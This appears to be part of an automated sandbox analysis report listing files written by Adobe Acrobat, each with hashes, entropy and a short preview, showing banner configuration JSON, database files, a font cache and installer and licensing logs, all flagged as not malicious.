                                                                                                SHA-256:F29DB9B6C9BB70974C635DADAC341D49F7EFFA98A27C78344F20B5FA054734B7
                                                                                                SHA-512:27C630E182C8BD5DB85073EE8DE3BF3B235A11575D41759487D519DFCFE9064FDCF92EDCF123F5EB4AC207E8E4D5A3B1415CFD0B53FC705E67A0CA909214BA90
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):285
                                                                                                Entropy (8bit):5.3644584443386085
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJfPmwrPeUkwRe9:YvXKXnXlK2Zc0vjgGH56Ukee9
                                                                                                MD5:EFF67DA4398455095F3881993EC39F4E
                                                                                                SHA1:38EB1376F293629EC65A0ED5E387728B54F90D72
                                                                                                SHA-256:4BA975ACD364B02E76D17B8CC0ECF5FCF29FA23826E363697B91E633870DBF26
                                                                                                SHA-512:A4F92C10A5A0BE583DCBF8C195A6B24C3E1C1659B7A4815A4771585582AAB268985C688E6ED52392D50C60698F96E6563E67EEDBAB63B975E1C8B5901E836759
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):1123
                                                                                                Entropy (8bit):5.692639688507538
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Yv6XVlzvj9pLgE9cQx8LennAvzBvkn0RCmK8czOCCSZ:YvGJr9hgy6SAFv5Ah8cv/Z
                                                                                                MD5:4EE6463E92953BD4C971CE618732CDF8
                                                                                                SHA1:C74A45793D504E8B54C15D5DD30420496272AB35
                                                                                                SHA-256:372A2BBECD99112BA7AD624569AAE4D3ECFFA868026750639B92B703DFD9BFCF
                                                                                                SHA-512:F2E20E9F6ADF50E6766E259DBCD79D061D0588E57680C2F4A652A15075B8579C57F49C289D149CEA1B567DD84E14978D866A53C55018D298DF07536A42115FA3
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):289
                                                                                                Entropy (8bit):5.314615883197046
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJf8dPeUkwRe9:YvXKXnXlK2Zc0vjgGU8Ukee9
                                                                                                MD5:4BA03B0E91D503F292D5DBAB459AD0A0
                                                                                                SHA1:05CC91AAFEB27E2B0E69B979352CD48AD007B152
                                                                                                SHA-256:70F7822EC655ACFA2B5A5E92D7B799A61319AC1504642781A8B88A3E8A9A11A0
                                                                                                SHA-512:D146D5B9C1927D4956D626E7847E64A7E924F55712F610640B5D8AAA84D9BA327B2BC6A9F354F12E0205D4416447042036963C6B3B53C9562A4B90C755D1C3AA
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):292
                                                                                                Entropy (8bit):5.318348157651778
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJfQ1rPeUkwRe9:YvXKXnXlK2Zc0vjgGY16Ukee9
                                                                                                MD5:BEF8F63EC1EB136AC4626BE46B82957B
                                                                                                SHA1:98156A5E749B67B737D7F65F16D5ED3C6D93673E
                                                                                                SHA-256:94668AE8D6A5E3DF3D6447B3018000E6374FE304FFA90CCEF9E8D15064F31623
                                                                                                SHA-512:32453460EC905FAC662F8FAD5033C7DED233D1D206CFA40DF7E5BBBAC18D4A298BC82D85A06F8B694CCF849F66AECE21FAFD081AC3DE9DD9AA913F1C75991DBA
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):289
                                                                                                Entropy (8bit):5.326185479476095
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJfFldPeUkwRe9:YvXKXnXlK2Zc0vjgGz8Ukee9
                                                                                                MD5:DDC8AFF34C38E4AEB4FD09F9DCF08FB8
                                                                                                SHA1:AF8E51B77315173D8916CC033EE61661CD985808
                                                                                                SHA-256:4221182B8737ABDF029635E5B75F9F8686DF6FA30C4F7FA638375BAC44BDBE4A
                                                                                                SHA-512:7722A97D7FAABAD5E3B1314EBB4BD63CB316CA571E832840C8378B4423B307B620CF4FFA3A9E6E4AA97F42F9F0A9B57CD68BDC8161AAB04D8D9951E1FEB3BD3E
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):295
                                                                                                Entropy (8bit):5.340413437041731
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJfzdPeUkwRe9:YvXKXnXlK2Zc0vjgGb8Ukee9
                                                                                                MD5:C95F4EC031961F1736DE99A79BCFB6A4
                                                                                                SHA1:C0BB7C56D5B3CAAF649ADA004EC09A08E0DD4175
                                                                                                SHA-256:5747D3373136F2300D5F8D7608BFE79A2A95BF12E57DCF2E9751CA99EA52FE2E
                                                                                                SHA-512:64524E09601B226317B01240F2901CD30B719BEC575FE8E7FD1C6A11F05379236F9768EA3FC021E66C45AB2289136C3A0E3A99CE5C870FE8713262553D0DF299
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):289
                                                                                                Entropy (8bit):5.321200382145138
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJfYdPeUkwRe9:YvXKXnXlK2Zc0vjgGg8Ukee9
                                                                                                MD5:D90AF1CFE6BD06309240F3C26E7B115A
                                                                                                SHA1:BBEEA4893410557FDD89944E1D1CA8F4B19729FB
                                                                                                SHA-256:330EC3C4BE247003299058405646C43DE1BFAE3E188D5E9EDAD9D63CB7F7445A
                                                                                                SHA-512:06224C623EAAA6A9C335D42ABD4EF645848ADD3FAEE816DA25A547FECFCBF0627422FA1985B8F08039AA14FC7043BBA883F4933FE24BE27CE81AE01B3CE7273B
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):284
                                                                                                Entropy (8bit):5.307624001132538
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJf+dPeUkwRe9:YvXKXnXlK2Zc0vjgG28Ukee9
                                                                                                MD5:520776FDF5C5302F48F5DA78E3E52A5B
                                                                                                SHA1:9BC86D9A421CA2A212399E40B3902C940800EB90
                                                                                                SHA-256:C2FD2C7779686DB988304464E4569B444B1B5150203774E0015AA3BA8B174759
                                                                                                SHA-512:86B543585ED61AF54393C5D0F6AEC3E612D75530F9E057546E39135F1DFAABCAC05EC396BD335156D1FEC3C419F8554403E042D43DC02058ACA91001220AEC96
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):291
                                                                                                Entropy (8bit):5.30460177272522
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJfbPtdPeUkwRe9:YvXKXnXlK2Zc0vjgGDV8Ukee9
                                                                                                MD5:9E64FA1D632E563DD2B048FA79D90261
                                                                                                SHA1:B9146CBBA413C05F1617DAF618D10584877CA22A
                                                                                                SHA-256:E40FCAF52CE9307AE594C6A4831D38EF10919C5937DE4A352C1339378E175A4A
                                                                                                SHA-512:1ECD55E71093B6002173E4092FB6C5494732E6FA8B451104868A4574625DF624B266334296F31E0D1B27EB64E5E44584C6CA726F87EFA9552D778A5271CDC2ED
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):287
                                                                                                Entropy (8bit):5.309232289698803
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJf21rPeUkwRe9:YvXKXnXlK2Zc0vjgG+16Ukee9
                                                                                                MD5:32F97BE01B20F0955C13ED5CC9B98CC2
                                                                                                SHA1:EB08620C770BCBC10F5FB6997D46843BF43E4529
                                                                                                SHA-256:3A54160B6A5286D53894D436E030A94144E2AA44A33F4382D03DB50A3651865C
                                                                                                SHA-512:C804F36D6427B95387CEE419AC5905395D11D6422377B003A7E330EA15DAC14F65F5636BF45A41753384D0E68B5B94BA69AE4A0E46E07041F16630768DE1552F
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):1090
                                                                                                Entropy (8bit):5.669625536269093
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Yv6XVlzvjFamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSZ:YvGJr5BgkDMUJUAh8cvMZ
                                                                                                MD5:258E67E9B39D084069C13598A163BC11
                                                                                                SHA1:50259DC72A17D23461E21F1639E6E93ECB1A03C4
                                                                                                SHA-256:84C5A7E75F7931F0797CBE641B517FFF84D17760DC4B0264120F2CD3EC834ED6
                                                                                                SHA-512:7AFA21CA196E44C9D4DC52C4E4B7115D7D0F019C177128B72357482D9BEB524B85988B98DD202CB29F3246B632E63A3EE54AFAD1453466100E6BCD440690F71C
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):286
                                                                                                Entropy (8bit):5.287256046810014
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJfshHHrPeUkwRe9:YvXKXnXlK2Zc0vjgGUUUkee9
                                                                                                MD5:4DF9BDA8603C9FA4A42A0B17E9B055D1
                                                                                                SHA1:6FD5475C88A09CB8356912AEE10CADDB57C09F64
                                                                                                SHA-256:966366A948C18670F97162BC9ED2B1D2FE53CEFA9A53C4F5AB0FE2FFE3A2B4EA
                                                                                                SHA-512:4AF3C545CB1205AA4CD76785625E28FF0A50CAC4654CADF9955A64D9F01CF8CD0F549632F0F931FE2FCF50E9A8BE16FDB99354A1917503BBB4B7FA40507D233D
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):282
                                                                                                Entropy (8bit):5.297655758366639
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJTqgFCrPeUkwRe9:YvXKXnXlK2Zc0vjgGTq16Ukee9
                                                                                                MD5:6B78082E427AF2AA5F16FA67F04DE84F
                                                                                                SHA1:665FFFEEFF2453C579B8E1CDF96F2AF3BA09FDC6
                                                                                                SHA-256:8D5D44944DAA5C51F510F4F7AA2B5818B6186B0A612ACBB02FB724CBD30D927E
                                                                                                SHA-512:4291D53DFA0B58D09BAD02420180A3E3EC9C3C9D691321975E93C137EDD99A9A0464BD16CF604B417636AB4705C5A162003E1A0A8A6F3CEFBF3B2941719F75F8
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4
                                                                                                Entropy (8bit):0.8112781244591328
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:e:e
                                                                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                Malicious:false
                                                                                                Preview:....
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):2814
                                                                                                Entropy (8bit):5.138327300828571
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:YGkDaoayhPEa8HkfZ16xRESHoFjdLj0SPfOP2gOf2LShCDrQrY1m7c5aSqh9b+2a:Y18HGZ164JE+T4QQmwfqh9bYz
                                                                                                MD5:4BBFFADD7BEB6DD330C01B3DF5EE7A92
                                                                                                SHA1:708A7876EFCCA74DDB136683BB340CD6091056FC
                                                                                                SHA-256:C12C5D653A10409CBF388B07F2C19A98546CE84398693C7CED41518DC3158154
                                                                                                SHA-512:07EBC27F48809BC49F0D9485EF17C61B10CBDAF49E91B8DAD8E5707D71F8B535A1930099EAD1FE7E254FBC34C96E07FAC34F32374F4BD14774F813ADE51AD770
                                                                                                Malicious:false
                                                                                                Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"b391d89fe51b98fef4224da2206b8a9c","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736317347000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"3f3cba812935601e8fbb524aa25155e1","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736317347000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"4a4045b5746d97338e1c2ede48174898","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736317347000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"5712f994b0a56f05056a4a04478c39bd","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736317347000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"17ca576ee946fad3261cbe477c63fd75","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736317347000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"9313a9e71615c9492d3210a869ad6e17","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                                Category:dropped
                                                                                                Size (bytes):12288
                                                                                                Entropy (8bit):1.1873756932527415
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:TGufl2GL7msEHUUUUUUUUkSvR9H9vxFGiDIAEkGVvp2:lNVmswUUUUUUUUk+FGSItq
                                                                                                MD5:B57104D8E52C51CF8EB2B70E71F5F8E8
                                                                                                SHA1:F166FDC5E9DD1CB25880FA29A022A41A75A57F75
                                                                                                SHA-256:0A21064DF55E4AEB4BC8E5F8196281A732B45FF6BACE586FA70CB98DDE0C2A5B
                                                                                                SHA-512:F467E60403D35597462D075F51451A21A76ABAAA96DDAC1F3A64E190B69D05F3A3796F1FE7A7DC1232CB1D53B4FF04379FA2AA50F940EAC4BA987DF23774047C
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:SQLite Rollback Journal
                                                                                                Category:dropped
                                                                                                Size (bytes):8720
                                                                                                Entropy (8bit):1.6078009353439666
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:7M7KUUUUUUUUUUmvR9H9vxFGiDIAEkGVvDqFl2GL7msP:71UUUUUUUUUUKFGSIt1KVmsP
                                                                                                MD5:8707D48E4504C4B881699FD60BEFA95F
                                                                                                SHA1:81C169FCD89089DCBDC8F7F0E8C8CBF9DCDF655C
                                                                                                SHA-256:17E1D9DC17FB241ED105E4C94A0D7BF6E54F1E7E81F21B131EE82D55E63591DE
                                                                                                SHA-512:CDCDD586F0878AE4D26E319FDDFAE62665A5E3179A99070C09A46EB46E8FAF673786AF66800D24CF8E1474E4CD13225E2485682849068392BD9BB8FA8C0E8EF2
                                                                                                Malicious:false
                                                                                                Preview:.... .c......F.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):66726
                                                                                                Entropy (8bit):5.392739213842091
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:RNOpblrU6TBH44ADKZEg1PhZnfW/8Bz23pzE9TuEifAYyu:6a6TZ44ADE1PPnfW/8kEeAK
                                                                                                MD5:53E680FF48C10F037D354238AB6D9DDC
                                                                                                SHA1:255565CC17DE138317E141EAB9EF3DBA072BA9AA
                                                                                                SHA-256:EE05310C5C90F2ECA46511EC526344B5F768ECD914B650F94DB7A04A85E5C78B
                                                                                                SHA-512:446A02E7BB5A1DABDA47DFB9EF3CC517A3D7735306A6786F6AF514D2057356EF0C693B18835491143EC883E6C16C2230E822C163F8EE5DB9D92497E8A74D0E21
                                                                                                Malicious:false
                                                                                                Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):246
                                                                                                Entropy (8bit):3.503482856767026
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8esQCl8Bw:Qw946cPbiOxDlbYnuRK9W
                                                                                                MD5:97CAA37D21C59451A40E97E7A7F72CA7
                                                                                                SHA1:578C9F1B782653B520A7BDC4446BCCDD54229A18
                                                                                                SHA-256:F816AEEADC68C6D803DC1321EAA7EBA15BEB159CA10631C8CDB7C7B9CDFE8A15
                                                                                                SHA-512:55483CC518EF2B940DA521E37DEAD34EE17235CF5BE2B63021236F114905934BAF69BAE2F1B55B37FEE753BF9809BC1FEE76FB84888E6C134D7DE859C6A69C78
                                                                                                Malicious:false
                                                                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.8./.0.1./.2.0.2.5. . .0.1.:.2.2.:.2.9. .=.=.=.....
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:ASCII text, with very long lines (393)
                                                                                                Category:dropped
                                                                                                Size (bytes):16525
                                                                                                Entropy (8bit):5.345946398610936
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                                                MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                                                SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                                                SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                                                SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                                                Malicious:false
                                                                                                Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
